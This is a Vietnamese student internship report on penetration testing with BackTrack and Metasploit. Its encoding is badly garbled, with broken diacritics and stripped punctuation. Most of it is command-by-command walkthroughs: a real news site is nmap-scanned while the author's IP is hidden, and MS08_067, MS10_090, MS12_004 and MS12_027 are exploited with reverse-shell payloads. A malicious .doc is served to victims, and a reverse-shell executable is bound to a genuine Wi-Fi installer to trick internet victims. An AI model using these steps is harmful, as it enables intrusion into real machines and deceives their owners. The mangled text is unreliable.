- Ngagravey 0710 Nhận đề tagravei thực tập Xaacutec định caacutec bước thực hiện Quay clip
giới thiệu
- Ngagravey 0910 Tigravem hiểu vagrave cagravei đặt BackTrack
- Ngagravey 1110 Tigravem hiểu caacutec sản phẩm của Athena Tigravem hiểu caacutech thức phaacutet
hiện lỗi bằng Backtrack
- Ngagravey 1410 Tigravem hiểu scan hệ thống
- Ngagravey 1610 Cagravei đặt Nessus queacutet thocircng tin maacutey XP Tigravem hiểu nmap-scripts
- Ngagravey 1810 Tigravem hiểu lỗ hổng ms08_067
- Ngagravey 2110 Tigravem hiểu lỗ hổng ms10_090
- Ngagravey 2410 Tigravem hiểu lỗ hổng ms12_004
- Ngagravey 2610 Tigravem hiểu lỗ hổng ms12_027
- Ngagravey 2810 Tigravem hiểu lỗ hổng ms12_020
- Ngagravey 3010 Tigravem hiểu về cocircng cụ Metasploit trong BackTrack
- Ngagravey 0311 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms08_067
bằng Metasploit( httpswwwyoutubecomwatchv=m3M33vEqg4s)
- Ngagravey 0511 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms10_090
bằng Metasploit( httpswwwyoutubecomwatchv=fUygw4tjDOI)
- Ngagravey 0811 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_004
bằng Metasploit( httpswwwyoutubecomwatchv=hPmPqKC2zaM)
- Ngagravey 1111 Thực hiện xacircm nhập hệ điều hagravenh XP qua lỗ hổng ms12_027
bằng Metasploit( httpswwwyoutubecomwatchv=BDVLpPF_NOg)
- Ngagravey 2511 Tigravem hiểu về VPS Honeypot
- Ngagravey 2911 Cagravei đặt Metasploit trecircn VPS Xacircm nhập windows 8 từ VPS
(Cagravei đặt httpswwwyoutubecomwatchv=pkEn79kQ4CI)
(Xacircm nhập windows 8 httpswwwyoutubecomwatchv=0DtgzfdPl8A)
22 QUAacute TRIgraveNH THI COcircNG CAacuteC HẠNG MỤC CỦA DỰ AacuteN
221 Tổng quan về BackTrack
2211 Giới thiệu Backtrack
Backtrack lagrave một hệ điều hagravenh phaacutet triển trecircn nhacircn Linux đồng thời cũng lagrave bộ sưu tập caacutec
cocircng cụ kiểm tra đaacutenh giaacute mức độ an ninh của hệ thống mạng một caacutech toagraven diện Backtrack
trở thagravenh một cocircng cụ khocircng thể thiếu với những ai muốn tigravem hiểu nghiecircn cứu vagrave khaacutem phaacute
thế giới bảo mật
6
Nguồn tải httpwwwbacktrack-linuxorgdownloads
2212 Lịch sử phaacutet triển
Backtrack lagrave một bản phacircn phối dạng Live DVD của Linux được phaacutet triển để thử nghiệm
thacircm nhập Trong caacutec định dạng Live DVD bạn sử dụng coacute thể Backtrack trực tiếp từ đĩa
DVD magrave khocircng cần cagravei noacute vagraveo maacutey của bạn Backtrack cũng coacute thể được cagravei đặt vagraveo ổ
cứng vagrave sử dụng như một hệ điều hagravenh Backtrack lagrave sự hợp nhất giữa 3 bản phacircn phối
khaacutec nhau của Linux về thacircm nhập thử nghiệm -IWHAX WHOPPIX vagrave Auditor Trong
phiecircn bản hiện tại của noacute (40) Backtrack được dựa trecircn phiecircn bản phacircn phối Linux Ubuntu
810 Tiacutenh đến ngagravey 19 thaacuteng bảy năm 2010 Backtrack 4 đatilde được tải về của hơn 15 triệu
người sử dụng Backtrack dagravenh cho tất cả mọi người từ caacutec chuyecircn gia trong lĩnh vực bảo
mật tới những người mới bước vagraveo lĩnh vực an toagraven thocircng tin vagrave bạn coacute thể dễ dagraveng tigravem vagrave
cập nhật cơ sở dữ liệu một caacutech nhanh nhất về bộ sưu tập caacutec cocircng cụ bảo mật Cộng đồng
phaacutet triển lecircn Backtrack bao gồm từ những người coacute kiến thức sacircu vagrave kinh nghiệm trong lĩnh
vực an toagraven thocircng tin tới từ caacutec cơ quan chiacutenh phủ trong lĩnh vực cocircng nghệ thocircng tin
hoặc những người đam mecirc về bảo mật đến caacutec caacute nhacircn mới gia nhập vagraveo cộng đồng bảo
mật Hiện nay Backtrack đatilde phaacutet triển đến phiecircn bản mới nhất lagrave Backtrack6 (hay cograven gọi lagrave
Kali Linux)
2213 Mục điacutech
Backtrack chứa một số cocircng cụ coacute thể được sử dụng trong quaacute trigravenh thử nghiệm thacircm nhập
của bạn Caacutec cocircng cụ kiểm tra thacircm nhập trong Backtrack coacute thể được phacircn loại như sau
- Information gathering loại nagravey coacute chứa một số cocircng cụ coacute thể được sử dụng để coacute
được thocircng tin liecircn quan đến một mục tiecircu DNS định tuyến địa chỉ e-mail trang web
maacutey chủ mail Thocircng tin nagravey được thu thập từ caacutec thocircng tin coacute sẵn trecircn Internet magrave
khocircng cần chạm vagraveo mocirci trường mục tiecircu
- Network mapping loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để kiểm tra caacutec
host đang tồn tại thocircng tin về OS ứng dụng được sử dụng bởi mục tiecircu vagrave cũng
lagravem portscanning
- Vulnerability identification Trong thể loại nagravey bạn coacute thể tigravem thấy caacutec cocircng cụ để
queacutet caacutec lỗ hổng (tổng hợp) vagrave trong caacutec thiết bị Cisco Noacute cũng chứa caacutec cocircng cụ để
thực hiện vagrave phacircn tiacutech Server Message Block (SMB) vagrave Simple Network
Management Protocol (SNMP)
7
- Web application analysis loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng trong theo
dotildei giaacutem saacutet caacutec ứng dụng web
- Radio network analysis Để kiểm tra mạng khocircng dacircy bluetooth vagrave nhận dạng tần
số vocirc tuyến (RFID) bạn coacute thể sử dụng caacutec cocircng cụ trong thể loại nagravey
- Penetration loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để khai thaacutec caacutec lỗ hổng
tigravem thấy trong caacutec maacutey tiacutenh mục tiecircu
- Privilege escalation Sau khi khai thaacutec caacutec lỗ hổng vagrave được truy cập vagraveo caacutec maacutey
tiacutenh mục tiecircu bạn coacute thể sử dụng caacutec cocircng cụ trong loại nagravey để nacircng cao đặc quyền
của bạn cho caacutec đặc quyền cao nhất
- Maintaining access Cocircng cụ trong loại nagravey sẽ coacute thể giuacutep bạn trong việc duy trigrave
quyền truy cập vagraveo caacutec maacutey tiacutenh mục tiecircu Bạn coacute thể cần để coacute được những
đặc quyền cao nhất trước khi caacutec bạn coacute thể cagravei đặt cocircng cụ để duy trigrave quyền truy
cập
- Voice Over IP (VOIP) Để phacircn tiacutech VOIP bạn coacute thể sử dụng caacutec cocircng cụ trong thể
loại nagravey
Backtrack cũng coacute những tool sử dụng cho
- Digital forensics Trong loại nagravey bạn coacute thể tigravem thấy một số cocircng cụ coacute thể được sử
dụng để lagravem phacircn tiacutech kỹ thuật như coacute được higravenh ảnh đĩa cứng cấu truacutec caacutec tập
tin vagrave phacircn tiacutech higravenh ảnh đĩa cứng Để sử dụng caacutec cocircng cụ cung cấp trong thể loại
nagravey bạn coacute thể chọn Start Backtrack Forensics trong trigravenh đơn khởi động Đocirci khi
sẽ đogravei hỏi bạn phải gắn kết nội bộ đĩa cứng vagrave caacutec tập tin trao đổi trong chế độ chỉ
đọc để bảo tồn tiacutenh toagraven vẹn
- Reverse engineering Thể loại nagravey chứa caacutec cocircng cụ coacute thể được sử dụng để gỡ rối
chương trigravenh một hoặc thaacuteo rời một tập tin thực thi
222 Footprinting lagrave gigrave
Footprinting lagrave 1 trong 3 quaacute trigravenh đầu tiecircn magrave hacker sẽ tiến hagravenh nhằm thu thập
thocircng tin của mục tiecircu thocircng qua caacutec cơ sở dữ liệu cocircng khai như caacutec thocircng tin về tecircn
miền của tổ chức danh bạn điện thọai caacutec trang vagraveng doanh nghiệp để tigravem kiếm địa
chỉ số điện thọai địa chỉ email của caacutec bộ phận vv Đacircy lagrave bước rất quan trọng vagrave
caacutec attacker thường dagravenh ra đến 90 thời gian để tiến hagravenh thu thập thocircng tin cograven quaacute
trigravenh tấn cocircng chỉ diễn ra trong 10 trong toagraven bộ quaacute trigravenh Điều nagravey cũng giống như
bước chuẩn bị khi chuacuteng ta cần tiến hagravenh triển khai một cocircng việc nagraveo đoacute trong quaacute trigravenh
8
kinh doanh hay phaacutet triển yacute tưởng mới Thocircng tin cagraveng nhiều thigrave cơ hội tấn cocircng thagravenh
cocircng cagraveng cao Để tiến hagravenh thu thập thocircng tin một caacutech khoa học caacutec hackerattacker
cần thực hiện theo một sơ đồ như sau
1 Tigravem kiếm từ caacutec nguồn thocircng tin
2 Xaacutec định caacutec datildey địa chỉ mạng
3 Xaacutec định caacutec maacutey cograven họat động
4 Tigravem kiếm những port mở (open port) hay điểm truy cập của mục tiecircu (access point)
5 Dograve tigravem hệ điều hagravenh của mục tiecircu
6 Tigravem kiếm caacutec dịch vụ đang họat động trecircn những port mở
7 Lập mocirc higravenh mạng
Thocircng tin tigravem kiếm cần thiết như
1 Network Informations Domain Network blocks IP TCP hay UDP System
Enumeration ACLs IDSes vv
2 System Informations OS user and group name system name kiến truacutec system SNMP
Routing
3 Organziation Informations Tecircn cocircng ty nhacircn viecircn websites địa chỉ số điện thoại
Email liecircn lạc caacutec kiến thức liecircn quan đến tigravenh higravenh kinh doanh của cocircng ty
Trong quaacute trigravenh nagravey Hacker chủ yếu dugraveng caacutec phương tiện thocircng tin cocircng cộng như baacuteo
chiacute internet để tigravem hiểu caacutec thocircng tin hợp phaacutep về mục tiecircu necircn footprinting hầu như khocircng
thể phaacutet hiện vigrave đacircy lagrave hagravenh động hợp phaacutep
223 CAacuteC KIỂU FOOTPRINTING
2231 Passive Footprinting
Passive footprinting lagrave higravenh thức tiềm kiếm thocircng tin thocircng qua bagravei baacuteo trang web những
website hỗ trợ tigravem kiếm như wwwgooglecom wwwtenmienvn
wwwwhoisdomaintoolscom wwwarcchiveorg httpcentralopsnetco
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang webwwwtenmienvn
9
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
Ta tra cứu tecircn miền vnexpressnet thocircng qua trang web httpcentralopsnetco
10
Vagrave đacircy lagrave toagraven bộ thocircng tin về tecircn miền vnexpressnet
11
12
13
2232 ACTIVE FOOTPRING
Active Footprinting lagrave higravenh thức liecircn hệ trực tiếp với mục tiecircu để thu thập thocircng tin như
cocircng ty nhacircn viecircn địa chỉ network liecircn lạc qua Email để tigravem hiểu caacutec thocircng tin coacute thể
Phương phaacutep nagravey đogravei hỏi nhiều kỹ năng giao tiếp vagrave kỹ năng khai thaacutec thocircng tin nếu như
bạn coacute đầu oacutec thaacutem tử thigrave mọi chuyecircn trở necircn đơn giản rất nhiều
224 SCANING LAgrave GIgrave
Scanning lagrave quaacute trigravenh tigravem hiểu thocircng tin về caacutec live host trecircn mạng để hacker quyết định
kiểu tấn cocircng nagraveo thiacutech hợp để tấn cocircng vagraveo hệ thống nếu như quaacute trigravenh footprinting lagrave
việc xaacutec định nguồn thocircng tin ở đacircu thigrave scanning chiacutenh lagrave quagrave trigravenh sagraveng lọc ragrave soaacutet tigravem
kiếm những caacutenh cổng cũng như lỗ hổng hệ thống để xacircm nhập vagraveo những vagraveo nguồn
thocircng tin đoacute Trong quaacute trigravenh scanning hacker sẽ tigravem kiếm những đối tượng sau
- Live system Xaacutec định xem hệ thống magrave chuacuteng ta đang nhắm tới coacute cograven hoạt
động hay khocircng Maacutey tiacutenh (host) đang queacutet coacute hoạt động trecircn internet hay khocircng
Địa chỉ ip coacute đang trong trạng thaacutey public
- Port Mục tiecircu tiếp theo lagrave xaacutec định caacutec port đang mở Việc xaacutec định port nagravey cho
pheacutep chuacuteng ta biết maacutey tiacutenh đoacute đang mở caacutec dịch vụ nagraveo Từ đoacute xaacutec định được
14
mục điacutech của cuộc tấn cocircng
- OS Xaacutec định hệ điều hagravenh đang sử dụng trecircn maacutey tiacutenh mục tiecircu sẽ giuacutep hacker
tigravem ra caacutec lỗ hổng thocircng dụng Caacutec hệ điều hagravenh khocircng nhiều thigrave iacutet cũng tiềm
ẩn những lỗ hổng tạo điều kiện cho kẻ tấn cocircng đột nhập Xaacutec định hệ điều hagravenh
cograven phải xaacutec định phiecircn bản của noacute
- Service Hiểu rotilde những dịch vụ đang chạy vagrave lắng nghe trecircn hệ thống điacutech
Phiecircn bản của dịch vụ nagraveo cũng chứa những lỗi nhỏ magrave nếu biết khai thaacutec lỗ nhỏ
đoacute thigrave noacute khocircng cograven nhỏ chuacutet nagraveo
- IP Address Khocircng chỉ coacute một ip của một host magrave chuacuteng ta cũng cẩn xaacutec định
datildey địa chỉ mạng vagrave những host khaacutec coacute liecircn quan như Default gateway DNS
Server
- Vulnerability Caacutec lỗi của host hoặc lỗi của hệ điều hagravenh
2241 CAacuteC COcircNG CỤ TIỆN IacuteCH
httpultrasurfus ta tải cocircng cụ về để che giấu đi địa chỉ IP thật của maacutey
httpnmaporgdownloadhtml ta scan những port đang mởđoacuteng những dịch vụ đang
chạy cugraveng với phiecircn bản đi kegravem
httpwwwtenablecomproductsnessusselect-your-operating-system cocircng cụ queacutet lỗi hệ
điều hagravenh
2242 QUAacute TRIgraveNH THỰC HIỆN SCANING
Bước 1 Cho giấu địa chỉ IP của migravenh để traacutenh bị phaacutet hiện
Ta truy cập vagraveo trang web httpultrasurfus ta tải cocircng cụ vagrave cagravei đặt
15
Sau đoacute ta vagraveo website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP ở
Việt Nam
Ta chạy phần mềm ultrasurf vagrave xuất hiện goacutec phải becircn dưới biểu tượng ổ khoacutea magraveu
vagraveng đacircy lagrave biểu tượng kiacutech hoạt IP maacutey đatilde được thay đổi
16
Ta truy cập lại website httpip2locationcom để kiểm tra IP của maacutey kết quả lagrave IP đatilde
thay đổi thagravenh IP của Mỹ
Bước 2 Scan port cugraveng một trong datildey mạng
Ta bật maacutey Backtrack5 R3 lecircn đăng nhập vagrave khởi động Ternimal Ta gotilde lệnh
17
ping vnexpressnet để xaacutec định địa chỉ IP của trang website lagrave 11165248132
Ta tiếp tục gotilde lệnh nmap -sV -O 11165248132
18
Kết quả lagrave ta đatilde xaacutec định được những port đang mở tecircn dịch vụ đang chạy
Ta tiếp tục truy cập website httpnewsnetcraftcom để xaacutec định OS Web Server magrave
trang websiter đang chạy
Bước 3 Sau khi xaacutec định được những thocircng tin như port nagraveo đoacutengmở những dịch vụ
đang chạy phiecircn bản đi kegravem ta bắt đầu Scan những lỗi liecircn quan Ta download vagrave cagravei đặt
cocircng cụ queacutet lỗi Nessus từ trang web
httpwwwtenablecomproductsnessusselect-your-operating-system
Giao diện đăng nhập của Nessus
19
Ta đăng nhập với user vagrave password đatilde khai baacuteo luacutec cagravei đặt
Thiết lập những Policie cần thiết để phục vụ quaacute trigravenh Scan lỗi tương ứng sau khi
đatilde thiết lập xong ta bắt đầu Scan lỗi hệ điều hagravenh
Tại ocirc Name ta điền tecircn hệ điều hagravenh Policy ta chọn Policies đatilde thiết lập trước đoacute
Target chiacutenh lagrave mục tiecircu magrave ta muốn Scan Vagrave chon Lauch để bắt đầu Scan Kết quả sau
khi Scan Windows XP Service Pack 2
Những lỗi magraveu đỏ thể hiện đoacute chiacutenh lagrave những lỗi nghiecircm trọng Magraveu Vagraveng chỉ ở mức
trung bigravenh vagrave magraveu xanh lagrave những thocircng ti về hệ điều hagravenh
20
Cuối cugraveng sau khi đatilde xaacutec định được những lỗi của hệ điều hagravenh ta bắt đầu tigravem hiểu
khai thaacutec những lỗ hỏng đoacute
225 QUAacute TRIgraveNH XAcircM NHẬP HỆ THỐNG QUA CAacuteC LỖ HỔNG
Cần chuẩn bị 1 maacutey cagravei Backtrack vagrave 1 maacutey đoacuteng vai trograve lagrave maacutey nạn nhacircn để ta xacircm nhập
( sử dụng hệ điều hagravenh XP) Kết nối 2 maacutey như mocirc higravenh becircn dưới
2251 LỖI MS08_067
21
Đặt IP cho maacutey BackTrack vagrave maacutey XP Chắc chắn rằng 2 maacutey đatilde kết nối thocircng với nhau
Tại maacutey Backtrackkhởi động Metasploit bằng lệnh ldquomsfconsolerdquo
Sau đoacute gotilde lệnh ldquosearch ms08_067rdquo để tigravem module lỗi trong metasploit
22
Sau khi tigravem kiếm sẽ hiện ra đường dẫn của module Ta gotilde lệnh ldquouse đường dẫnrdquo để
vagraveo cấu higravenh module
23
Gotilde lệnh ldquoshow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Lần lượt cấu higravenh
- Set RHOST [ip maacutey xp]
- Set payload winsowsmeterpreterreverse_tcp
- Set Lhost [ip maacutey BackTrack]
24
Sau đoacute gotilde lệnh ldquoExploitrdquo để bắt đầu quaacute trigravenh khai thaacutec
Sau khi maacutey BackTrack thocircng baacuteo đatilde thiết lập được 1 sessions thigrave ta đatilde coacute thể lagravem chủ
maacutey nạn nhacircn
- Gotilde lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Gotilde lệnh ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Gotilde lệnh ldquo shellrdquo để bắt đầu xacircm nhập vagraveo maacutey nạn nhacircn Luacutec nagravey ta đatilde coacute
quyền tương đương user đang đăng nhập trecircn maacutey nạn nhacircn
25
Dấu nhắc lệnh tại cửa sổ console đứng tại ldquo CWINDOWSSYSTEM32rdquo Sử dụng lệnh
ldquomd trungrdquo để tạo 1 thư mục coacute tecircn ldquotrungrdquo trong thư mục ldquosystem32rdquo trecircn maacutey XP
26
Vagrave kết quả trong thư mục ldquosystem32rdquo trong ổ đĩa ldquoCrdquo của maacutey xp đatilde coacute thư mục ldquotrungrdquo
vừa tạo
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh khai thaacutec matilde lỗi ms08_067
2252 LỖI MS10_090
Dugraveng lệnh ldquoifconfigrdquo để kiểm tra ip maacutey BackTrack
Tại maacutey XP dugraveng lệnh ldquoipconfigrdquo để kiểm tra ip
27
Trecircn maacutey BackTrack dugraveng lệnh ldquoping [ip maacutey XP]rdquo để đảm bảo 2 maacutey đatilde kết nối thocircng
với nhau
Gotilde lệnh ldquomsfconsolerdquo để khởi động metasploit
28
Gotilde lệnh ldquosearch ms10_090rdquo để tigravem kiếm module lỗi ms10_090
29
Sau khi coacute đường dẫn dugraveng lệnh ldquouse [đường dẫn của module]rdquo để bắt đầu thiết lập
thocircng số
Dugraveng lệnh ldquoshow optionsrdquo để biết caacutec thocircng tin cần thiết lập
30
Lần lượt thiết lập caacutec thocircng số bằng caacutec lệnh
- Set srvhost [ip maacutey backtrack]
- Set lhost [ip maacutey backtrack]
- Set payload windowsmeterpreterreverse_tcp
Cuối cugraveng dugraveng lệnh ldquoExploitrdquo để khởi động module
31
Luacutec nagravey tại maacutey Backtrack sẽ tạo ra 1 đường link Nếu maacutey XP nhấp vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
Mở trigravenh duyệt IE tại maacutey XP vagrave truy cập vagraveo đường link được tạo từ maacutey BackTrack
32
Luacutec nagravey maacutey BackTrack sẽ gửi matilde độc tới maacutey XP Vagrave sau đoacute thực hiện 1 phiecircn kết nối
để xacircm nhập
Dugraveng lệnh ldquosessionsrdquo để xem thocircng tin phiecircn kết nối
Tiếp theo dugraveng lệnh ldquosessions ndashI [ID của session]rdquo để bắt đầu xacircm nhập
33
Tới đacircy ta đatilde hoagraven tất quaacute trigravenh xacircm nhập Bacircy giờ ta dugraveng caacutec lệnh
- Sysinfo để lấy thocircng tin maacutey nạn nhacircn ( ở đacircy lagrave maacutey XP)
- Getuid để lấy thocircng tin Username
- Shell xacircm nhập vagraveo maacutey nạn nhacircn
Thử kết quả bằng caacutech dugraveng lệnh ldquo md trungrdquo để tạo 1 thư mục tecircn ldquotrungrdquo trecircn maacutey nạn
nhacircn
34
Vagrave kiểm tra trecircn magraven higravenh maacutey XP đatilde coacute thư mục vừa tạo
2253 LỖI MS12_004
Matilde lỗi nagravey khai thaacutec lỗi của file MIDI trong IE
Trước tiecircn trecircn maacutey BackTrack dugraveng lệnh ldquo ifconfigrdquo để kiểm tra địa chỉ IP Sau đoacute dugraveng
lệnh ldquo ping [IP maacutey XP]rdquo để kiểm tra kết nối giữa maacutey BackTrack vagrave maacutey XP đatilde thocircng
với nhau
35
Sau đoacute dugraveng lệnh ldquomsfconsolerdquo để khởi động Metasploit
Dugraveng lệnh ldquo search ms12_004rdquo để tigravem module của matilde lỗi
36
Sau khi hệ thống tigravem ra đường dẫn của module matilde lỗi ms12_004 Ta ghi nhớ đường dẫn
sau đoacute dugraveng lệnh ldquouse [đường dẫn]rdquo để bắt đầu sử dụng
37
Dugraveng lệnh ldquoShow optionsrdquo để xem caacutec thocircng tin cần thiết lập
Tiếp theo thiết lập caacutec thocircng số cần thiết bằng caacutec lệnh
- Set SRVHOST [ip maacutey Backtrack]
- Set LHOST [ip maacutey BackTrack]
- Set payload windowsmeterpreterreverse_tcp
38
Cuốt cugraveng gotilde lệnh ldquo Exploitrdquo để bắt đầu khai thaacutec lỗi
Luacutec nagravey maacutey BackTrack sẽ tạo ra 1 đương link Khi maacutey XP truy cập vagraveo đường link nagravey
thigrave sẽ bị xacircm nhập
39
Trecircn maacutey XP mở trigravenh duyệt IE vagrave truy cập vagraveo đường link đoacute
Ngay lập tức maacutey BackTrac sẽ gửi caacutec đoạn matilde độc để xacircm nhập dựa vagraveo lỗ hổng
40
Khi maacutey Backtrack thocircng baacuteo đatilde coacute 1 phiecircn kết nối thigrave luacutec đoacute ta đatilde coacute thể xacircm nhập vagraveo
maacutey nạn nhacircn
Dugraveng lệnh ldquosessionsrdquo để kiểm tra thocircng tin phiecircn kết nối
41
Tiếp theo dugraveng lệnh ldquosession ndashI [ID của phiecircn kết nối]rdquo để xacircm nhập vagraveo maacutey nạn
nhacircn
Tới đacircy ta đatilde coacute thể lagravem chủ hệ thống của maacutey nạn nhacircn
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
42
Thử tạo 1 thư mục coacute tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Ngay lập tức trecircn magraven higravenh maacutey XP sẽ coacute thư mục ldquotrungrdquo
43
Như vậy ta đatilde hoagraven thagravenh khai thaacutec matilde lỗi ms12_004
2254 LỖI MS12_027
Lỗi MS12_027 lagrave lỗi magrave thocircng qua bộ cocircng cụ Office hacker sẽ tấn cocircng vagraveo hệ thống vagrave
chiếm quyền điều khiển Trong caacutec phiecircn bản Office phổ biến (từ 2003 2007 2010) đều diacutenh
lỗ hổng nagravey
Bắt đầu quaacute trigravenh tấn cocircng Ta khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo trecircn
Backtrack
44
Dugraveng lệnh ldquosearch ms12_027rdquo để tigravem module của matilde lỗi trong Metasploit
Sau khi coacute đường dẫn của module Dugraveng lệnh ldquo use [đường dẫn module]rdquo để sử dụng
45
Gotilde lệnh ldquo Show optionsrdquo để xem những thuộc tiacutenh cần thiết lập
Cần tạo 1 file giả coacute định dạng doc để lagravem cocircng cụ xacircm nhập maacutey nạn nhacircn
Dugraveng lệnh ldquo Set filename [ten file]docrdquo
46
Tiếp đoacute lần lượt gotilde lệnh
- ldquoSet payload windowsmeterpreterreverse_tcprdquo thiết lập payload của
module
- ldquoSet LHOST [ip maacutey Backtrack]rdquo Thiết lập ip maacutey lắng nghe
Sau đoacute gotilde lệnh ldquoExploitrdquo để hoagraven thagravenh việc thiết lập thocircng tin vagrave tạo file giả
47
Maacutey Backtrack luacutec nagravey sẽ tạo ra file doc vagrave thocircng baacuteo đường dẫn file được tạo ra
Kế tiếp ta cần thiết lập 1 trigravenh lắng nghe vagrave điều khiển maacutey nạn nhacircn ( sau khi maacutey nạn
nhacircn bị nhiễm matilde độc trong file doc)
Dugraveng lệnh ldquouse exploitmultihandlerrdquo
48
Sau đoacute thiết lập caacutec thocircng số
- ldquoSet payload windowsmeterpreterreverse_tcprdquo
- ldquoSet LHOST [ip maacutey Backtrack]rdquo
Sau đoacute dugraveng lệnh ldquoExploitrdquo để bắt đầu lắng nghe vagrave thiết lập phiecircn kết nối với maacutey nạn
nhacircn để xacircm nhập ngay khi maacutey nạn nhacircn bị nhiễm matilde độc khi mở file doc
Tới đacircy đatilde hoagraven tất việc thiết lập vagrave triển khai xacircm nhập Giờ ta sẽ chờ maacutey nạn nhacircn bị
49
nhiễm matilde độc Caacutech dễ nhất lagrave đưa file doc lecircn trigravenh duyệt web để nạn nhacircn tải về
Copy file doc được tạo vagraveo thư mục varwww Mở console khaacutec lecircnh gotilde lệnh
ldquocp [đường dẫn tới file doc] varwwwrdquo
Sau đoacute triển khai web server bằng lệnh
ldquoetcinitdapache 2 startrdquo
Từ maacutey XP truy cập vagraveo địa chỉ ldquo http[ip maacutey backtrack][file doc]rdquo 1 cửa sổ ldquo file
downloadrdquo hiện ra
50
Khi file doc được mở tại maacutey nạn nhacircn Ngay luacutec nagravey maacutey Backtrack sẽ kết nối tới maacutey
nạn nhacircn vagrave bắt đầu xacircm nhập Khi coacute thocircng baacuteo 1 session đatilde được thiết lập thigrave ta đatilde coacute
thể chiểm quyền user đang đăng nhập trecircn maacutey nạn nhacircn
51
- Dugraveng lệnh ldquogetuidrdquo để lấy thocircng tin Username
- Dugraveng lện ldquosysinfordquo để xem thocircng tin maacutey nạn nhacircn
- Dugraveng lecircnh ldquoshellrdquo để xacircm nhacircp hệ thống
52
Tạo 1 thư mục tecircn ldquotrungrdquo bằng lệnh ldquomd trungrdquo
Kiểm tra trecircn magraven higravenh maacutey XP ta thấy thư mục vừa đươc tạo từ maacutey Backtrack
Tới đacircy ta đatilde kết thuacutec quaacute trigravenh xacircm nhập qua matilde lỗi ms12_027
2255 MỞ PORT TREN MODEMTẤN CONG NGOAI MẠNG
INTERNET
53
Đầu tiecircn dugraveng lệnh ldquopingrdquo để kiểm tra kết nối internet
Sau đoacute dugraveng lệnh ldquomsfpayload windowsshell_reverse_tcp LHOST=[ip mặt ngoagravei maacutey
Backtrack] LPORT=[port sẽ mở trong modem] X gt tmp[tecircn file]exerdquo để tạo 1 file shell
(file thực thi) Sau nagravey ta sẽ gửi file nagravey cho nạn nhacircn để kết nối với maacutey nạn nhacircn Trong
higravenh dưới
Lhost=15428158 lagrave ip mặt ngoagravei của maacutey Backtrack( Vagraveo trang whatismyipcom để xem
ip nagravey)
Lport=4455 lagrave port được chỉ định để lắng nghe phiecircn kết nối Port nagravey sẽ được mở trong
modem internet vagrave được trả về địa chỉ ip local của maacutey Backtrack
tmpMypublickWifiexe lagrave file shell ta tạo ra từ cacircu lệnh nagravey coacute tecircn lagrave ldquoMypublicWifirdquo vagrave
được lưu ở đường dẫn tmp
Dugraveng lệnh ldquoifconfigrdquo để xem ip của maacutey BackTrack trong mạng Lan Sau nagravey khi mở
port ta sẽ trỏ port đoacute về ip nagravey
54
Đăng nhập vagraveo modem từ trigravenh duyệt web vagraveo mục Nat vagrave mở port khi natildey ra đatilde chọn
55
Tiếp theo mở cửa sổ console khaacutec vagrave khởi động Metasploit bằng cacircu lệnh ldquomsfconsolerdquo
Sử dụng module multihander trong Metasploit để giữ kết nối
Gotilde lệnh ldquouse exploitmultihanderrdquo
Lần lượt gotilde caacutec lệnh
- ldquoSet payload windowsshellreverse_tcprdquo để chọn payload cho module
- ldquoSet lhost [ip mặt ngoagravei maacutey BackTrack]rdquo Cấu higravenh ip lắng nghe nhận kết nối
trecircn mạng
- ldquoSet lport [port được mở]rdquo Cấu higravenh port lắng nghe
Dugraveng lệnh ldquoShow optionsrdquo để kiểm tra lại thocircng tin đatilde cấu higravenh
56
Tới đacircy ta dugraveng lệnh ldquoexploitrdquo để bắt đầu lắng nghe
Việc cograven lại lagrave chờ nạn nhacircn bị nhiễm matilde độc khi chạy file shell ta đatilde tạo ra Vấn đề lagrave
lagravem sao để nạn nhacircn thực thi file đoacute File shell nằm trong đường dẫn ldquotmpmypublicwifirdquo
magrave khi natildey ta đatilde tạo
57
Ở đacircy ta gheacutep file ldquomypublicwifiexerdquo do Backtrack tạo ra với 1 file setup của phần mềm
phaacutet wifi coacute tecircn ldquomypublicwifiexerdquo thật sự khaacutec Việc nagravey sẽ dễ đaacutenh lừa được nạn nhacircn
hơn Khi gheacutep xong ta sẽ coacute 1 file setup của phần mềm mypublicwifi thật sự tuy nhiecircn
khi nạn nhacircn chạy file setup nagravey cũng sẽ đồng thời chạy file do Backtrack tạo ra Để gheacutep
được ta coacute thể tham khảo trecircn mạng với từ khoacutea ldquobind two exerdquo
58
Khi nạn nhacircn chạy file setup nagravey thigrave maacutey Backtrack lập tức sẽ tạo kết nối với maacutey nạn
nhacircn Khi coacute thocircng baacuteo 1 sessions được thiết lập thigrave ta đatilde xacircm nhập được vagraveo maacutey nạn
nhacircn
Thử tạo 1 thư mục trecircn ổ đĩa ldquoCrdquo của maacutey nạn nhacircn bằng lệnh
ldquoCd C rdquo Lệnh nagravey đưa vị triacute lagravem việc về ổ C
ldquomkdir Trungrdquo Lệnh nagravey tạo thư mục tecircn Trung
Vagrave kiểm tra trecircn maacutey nạn nhacircn
59
Tới đacircy ta kết thuacutec việc tấn cocircng maacutey nạn nhacircn ngoagravei mạng internet bằng Metasploit qua
việc tạo file shell chứa matilde độc
2256 CAgraveI ĐẶT METASPLOIT TREN VPS SỬ DỤNG GIAO DIỆN
WEB CỦA METASPLOIT KHAI THAacuteC MAtilde LỖI MS10_090 TỪ
VPS
Từ VPS tải phần mềm chương trigravenh Metasploit từ web site httpmetasploitcom Cagravei
đặt như caacutec phần mềm khaacutec Chuacute yacute tắt tường lửa vagrave chương trigravenh anti virut nếu coacute
Đăng nhập vagraveo VPS mở giao diện web của Metasploit Community
Chọn Start-gtprogram-gtmetasploit-gtAccess metasploit UI
60
